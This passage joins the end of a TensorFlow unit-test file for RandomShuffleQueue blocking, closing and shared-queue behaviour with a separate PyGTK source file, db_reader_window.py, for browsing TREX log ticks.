q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, sess.run(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
        # While the last dequeue failed, we want to ensure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(sess.run(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
def testBlockingEnqueueToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
sess.run(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
sess.run(blocking_enqueue_op)
# At this point the close operation will become unblocked, so the
# next enqueue will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
      # elements, and is blocked waiting for one more element to be dequeued.
self.assertEqual(size_t.eval(), 4)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# The close_op should run before the second blocking_enqueue_op
# has started.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
def testSharedQueueSameSession(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.eval()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.eval()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.eval()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.eval()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.eval()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.eval()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.eval()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.eval()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.eval()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.eval()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.eval()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("Index must be in the range"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
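# Illustrative sketch (not part of the test suite): the closed-queue
# behaviour exercised above, written against the public TensorFlow 1.x API.
# It assumes `tf.RandomShuffleQueue` is available; kept as comments so the
# module's behaviour is unchanged.
#
#   import tensorflow as tf
#
#   q = tf.RandomShuffleQueue(capacity=10, min_after_dequeue=2,
#                             dtypes=tf.float32, shapes=((),))
#   enqueue = q.enqueue_many(([10.0, 20.0, 30.0, 40.0],))
#   dequeue = q.dequeue_up_to(3)
#   with tf.Session() as sess:
#     sess.run(enqueue)
#     sess.run(q.close())       # closing lifts the min_after_dequeue floor
#     print(sess.run(dequeue))  # 3 elements, in shuffled order
#     print(sess.run(dequeue))  # the remaining 1 element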
|
db_reader_window.py
|
#!/usr/bin/env python
# System modules
import sys
import os,stat
import shutil
import time
import threading
import gtk
import gtk.glade
import unittest
# TREX modules
import TREX.util
from TREX.widgets_gtk import trex_glade_path
from TREX.core.assembly import Assembly
from TREX.io.db_reader import DbReader
##############################################################################
# DbReaderWindow
# This window provides a user with controls to step to any tick and re-run
# the data loader. It also does continuous polling of the file system in
# order to grab data for visualization as it is written to disk.
##############################################################################
# DbReaderWindow GTK widget class
class DbReaderWindow():
def __init__(self,db_reader=DbReader(),log_path="."):
# Store db reader
self.db_reader = db_reader
# Store path state information
self.log_path = log_path
self.reactor_name = ""
self.reactor_names = []
self.ticks = []
self.tick = 0
self.status_text = ""
# Initialize assembly dict self.db_cores[reactor_name]
self.db_cores = {}
# Listener structures
self.listeners = []
# Create glade window
tree = gtk.glade.XML(trex_glade_path("db_reader_window.glade"))
self.w = tree.get_widget("db_reader_window")
self.w.set_title("TREX Log Reader Control")
# Add references to all widgets
for w in tree.get_widget_prefix('_'):
name = w.get_name()[1:]
# Make sure we don't clobber existing attributes
assert not hasattr(self, name)
setattr(self, name, w)
self.path_chooser.set_filename(os.path.abspath(self.log_path))
self.path_chooser.connect("selection-changed",self.on_change_log_path)
self.reactor_chooser.connect("changed",self.on_change_reactor)
self.tick_combo_model = gtk.ListStore(str)
self.tick_combo_entry.set_model(self.tick_combo_model)
self.tick_combo_entry.set_text_column(0)
self.tick_entry.set_text(str(self.tick))
self.w.set_default(self.go_but)
self.go_but.connect("clicked",self.on_tick_set)
self.st_but.connect("clicked",self.on_tick_set_index,0)
self.bk_but.connect("clicked",self.on_tick_inc_index,-1)
self.fw_but.connect("clicked",self.on_tick_inc_index,1)
self.en_but.connect("clicked",self.on_tick_set_index,-1)
self.latest_toggle.connect("toggled",self.on_toggle_latest)
# Connect the load setting controls
self.assembly_ticks_only_check.connect("toggled",self.on_change_load_settings)
self.load_available_assembly_check.connect("toggled",self.on_change_load_settings)
self.assembly_ticks_only = False
self.load_available_assemblies = True
# Spin up the reload thread used to track the latest file
self.do_reload = False
self.running = True
self.reload_lock = threading.RLock()
self.reload_thread = threading.Thread(target=self.latest_reload_loop)
self.reload_thread.start()
self.w.connect("destroy", self.on_destroy)
self.w.show()
############################################################################
# Event Handlers
############################################################################
# Destruction handler to clean up threads
def on_destroy(self,widget):
self.running = False
self.reload_thread.join()
return True
# Callback for updating the log_path and gui fields when the log_path is changed
def on_change_log_path(self,widget):
if self.log_path == self.path_chooser.get_filename():
return False
self.log_path = self.path_chooser.get_filename()
self.load_available_reactors()
self.load_available_ticks()
# Try to load the latest tick
if len(self.ticks) > 0:
self.load_tick(self.ticks[-1])
# Callback for updating the reactor path when a different reactor is selected
def on_change_reactor(self,widget):
self.reactor_name = self.reactor_chooser.get_active_text()
# Note there is no need to re-load ticks because these are the same across reactors
if len(self.ticks) > 0:
self.load_tick(self.tick)
# Callback for setting the tick value
def on_tick_set(self,widget):
try:
self.load_tick(self.unformat_tick(self.tick_entry.get_text()))
except:
self.set_status("Malformatted tick entry!")
# Callback for setting the tick index
def on_tick_set_index(self,widget,index):
self.load_tick(self.ticks[index])
# Callback for incrementing the tick index
def on_tick_inc_index(self,widget,index_inc):
tick = self.tick_increment(index_inc)
self.load_tick(tick)
# Callback for toggling latest tick tracking
def on_toggle_latest(self,widget):
enabled = self.latest_toggle.get_active()
self.reload_lock.acquire()
self.do_reload = enabled
self.reload_lock.release()
        self.update_available_buttons()
# Callback for changing load parameters
def on_change_load_settings(self,widget):
# Get the tick restrictions
self.assembly_ticks_only = self.assembly_ticks_only_check.get_active()
self.load_available_assemblies = self.load_available_assembly_check.get_active()
############################################################################
# GUI interaction
############################################################################
# Load the reactors in the current log path and update the drop-down list accordingly
def load_available_reactors(self):
        # Initialize available reactor names
available_reactor_names = []
try:
# Get the available reactors from the db reader
available_reactor_names = self.db_reader.get_available_reactors(self.log_path)
except OSError:
self.set_status("No reactor list at log path.")
except:
self.set_status("Failed to load reactor list from log path.")
self.reactor_names = []
self.reactor_name = ""
# If any one name has been removed, refresh the list entirely
if len(self.reactor_names) != len(available_reactor_names) or not all([name in self.reactor_names for name in available_reactor_names]):
# Empty the dropdown list
for name in self.reactor_names:
self.reactor_chooser.remove_text(0)
self.reactor_names = []
# Append any names that are found but not already registered
for name in [name for name in available_reactor_names if name not in self.reactor_names]:
self.reactor_chooser.append_text(name)
self.reactor_names.append(name)
# Set the first option in the list to be active
if len(self.reactor_names) > 0 and self.reactor_chooser.get_active() == -1:
self.reactor_chooser.set_active(0)
self.reactor_name = self.reactor_names[0]
# Load the available ticks and update the buttons accordingly
def load_available_ticks(self):
# Initialize available ticks
available_ticks = []
try:
if self.assembly_ticks_only:
available_ticks = self.db_reader.get_available_assemblies(self.log_path,self.reactor_name)
else:
available_ticks = self.db_reader.get_available_db_cores(self.log_path,self.reactor_name)
except:
if self.reactor_name != "":
self.set_status("Failed to load any ticks from log path.")
self.tick = -1
available_ticks = []
self.db_cores = {}
self.reactor_name = None
self.tick_entry.set_text("")
self.notify_listeners()
if len(available_ticks) != len(self.ticks) or (len(self.ticks) + len(available_ticks) > 0 and available_ticks[-1] != self.ticks[-1]):
# Append any names that are found but not already registered
#for t in [t for t in available_ticks if t not in self.ticks]:
#self.tick_combo_model.append([self.format_tick(t)])
self.ticks = available_ticks
            # Make sure the selected tick is available
if self.tick not in self.ticks and len(self.ticks) > 0:
# Set the tick to the latest tick
self.tick = self.ticks[-1]
# Update the display
self.update_tick_entry()
# Load the assembly
self.load_tick(self.tick)
# Enable and disable buttons accordingly
self.update_available_buttons()
# This enables and disables the navigator buttons based on the available ticks
def update_available_buttons(self):
# Check if the latest tracking button is enabled
latest_enabled = self.latest_toggle.get_active()
# If there are no reactors, disable the combobox
self.reactor_chooser.set_sensitive(len(self.reactor_names) > 0)
# Set the button sensitivities
if len(self.ticks) == 0 or latest_enabled:
# Disable the other tick control buttons
self.tick_entry.set_sensitive(False)
self.go_but.set_sensitive(False)
self.bk_but.set_sensitive(False)
self.st_but.set_sensitive(False)
self.en_but.set_sensitive(False)
self.fw_but.set_sensitive(False)
else:
self.tick_entry.set_sensitive(True)
self.go_but.set_sensitive(True)
if self.ticks.index(self.tick) == 0:
self.bk_but.set_sensitive(False)
self.st_but.set_sensitive(False)
else:
self.bk_but.set_sensitive(True)
self.st_but.set_sensitive(True)
if self.ticks.index(self.tick) == len(self.ticks)-1:
self.en_but.set_sensitive(False)
self.fw_but.set_sensitive(False)
else:
self.en_but.set_sensitive(True)
self.fw_but.set_sensitive(True)
# Update the text entry to reflect the current tick
def update_tick_entry(self):
self.tick_entry.set_text(self.format_tick(self.tick))
def format_tick(self,tick):
return "%d.%d" % (tick[0],tick[1])
def unformat_tick(self,tick):
i = tick.split(".")
return (int(i[0]),int(i[1]))
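    # Example round-trip (illustrative): format_tick((5, 0)) yields "5.0" and
    # unformat_tick("5.0") yields (5, 0); ticks are two-element tuples
    # rendered as "<first>.<second>" in the tick entry widget.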
# Set the status text
def set_status(self,text):
self.status_text = text
self.statusbar.pop(0)
self.statusbar.push(0,self.status_text)
############################################################################
# Tick manipulation
############################################################################
# Calculate a new tick by incrementing current tick some indices forward or backward
def tick_increment(self, index_inc):
new_tick = 0
try:
cur_index = self.ticks.index(self.tick)
new_tick = self.ticks[cur_index + index_inc]
except:
self.set_status("Tick %d not available." % (new_tick))
return new_tick
############################################################################
